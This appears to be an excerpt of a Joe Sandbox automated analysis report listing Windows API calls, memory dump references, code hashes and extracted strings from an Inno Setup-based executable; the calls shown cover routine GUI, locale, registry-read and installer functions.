                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 361401722-0
                                                                          • Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                          • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                          • Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                          • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
                                                                          • 73A14620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
                                                                          • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
                                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                          • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                          • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                          • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectStock$A14620A480A570IconLoad
                                                                          • String ID:
                                                                          • API String ID: 2920975243-0
                                                                          • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                          • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                          • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                          • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
                                                                          • SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID: $ $Internal error: Item already expanding
                                                                          • API String ID: 1675784387-1948079669
                                                                          • Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                          • Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
                                                                          • Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                          • Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19
                                                                          APIs
                                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
                                                                          • 73A159E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
                                                                          • GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A159ClassInfoMessageSend
                                                                          • String ID: COMBOBOX$Inno Setup: Language
                                                                          • API String ID: 3375322265-4234151509
                                                                          • Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                          • Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
                                                                          • Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                          • Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                            • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                            • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                          • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                          • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                          • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                          APIs
                                                                          • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                            • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                            • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                          • String ID: ,$?
                                                                          • API String ID: 2359071979-2308483597
                                                                          • Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                          • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                          • Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                          • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                          • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                          • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                          • String ID:
                                                                          • API String ID: 1030595962-0
                                                                          • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                          • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                          • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                          • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
APIs
• SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
• 73A14620.GDI32(00000000,00000026), ref: 0041CF2D
• 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
• 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
• StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
• StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
• 73A08830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: Stretch$A08830$A022A14620BitsMode
• String ID:
• API String ID: 2733548868-0
• Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
• Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
• Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
• Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
APIs
• SendMessageA.USER32(00000000,?,?), ref: 00456526
  • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
  • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
  • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
• TranslateMessage.USER32(?), ref: 004565AB
• DispatchMessageA.USER32(?), ref: 004565B4
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
• String ID: [Paused]
• API String ID: 1715372110-4230553315
• Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
• Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
• Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
• Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
APIs
• GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
• LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
• SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
• Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
• SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: Cursor$LoadSleep
• String ID: CheckPassword
• API String ID: 4023313301-1302249611
• Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
• Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
• Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
• Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
APIs
  • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
  • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
  • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
• SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
• GetTickCount.KERNEL32 ref: 0047678E
• GetTickCount.KERNEL32 ref: 00476798
• MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
Strings
• CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
• CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
• String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
• API String ID: 613034392-3771334282
• Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
• Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
• Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
• Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D
APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
Strings
• .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
• Fusion.dll, xrefs: 00458EFF
• Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
• Failed to load .NET Framework DLL "%s", xrefs: 00458F44
• CreateAssemblyCache, xrefs: 00458F56
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: AddressProc
• String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
• API String ID: 190572456-3990135632
• Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
• Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
• Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
• Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799
APIs
  • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
• GetFocus.USER32 ref: 0041C178
• 73A0A570.USER32(?), ref: 0041C184
• 73A08830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
• 73A022A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
• 73A08830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
• 73A0A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: A08830$A022A480A570BitsFocusObject
• String ID:
• API String ID: 1424713005-0
• Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
• Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
• Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
• Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
APIs
• GetSystemMetrics.USER32(0000000E), ref: 00418C80
• GetSystemMetrics.USER32(0000000D), ref: 00418C88
• 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
  • Part of subcall function 004099C0: 6F51C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
• 6F58CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
• 6F58C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
• 6F58CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
• 6F520860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: MetricsSystem$C400C740F520860F522980
• String ID:
• API String ID: 2856677924-0
• Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
• Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
• Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
• Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CloseOpen
• String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
• API String ID: 47109696-2530820420
• Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
• Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
• Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
• Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D
                                                                          APIs
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                          • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$Delete$Stretch
                                                                          • String ID:
                                                                          • API String ID: 1458357782-0
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,?,00000000), ref: 00493979
                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0049399B
                                                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
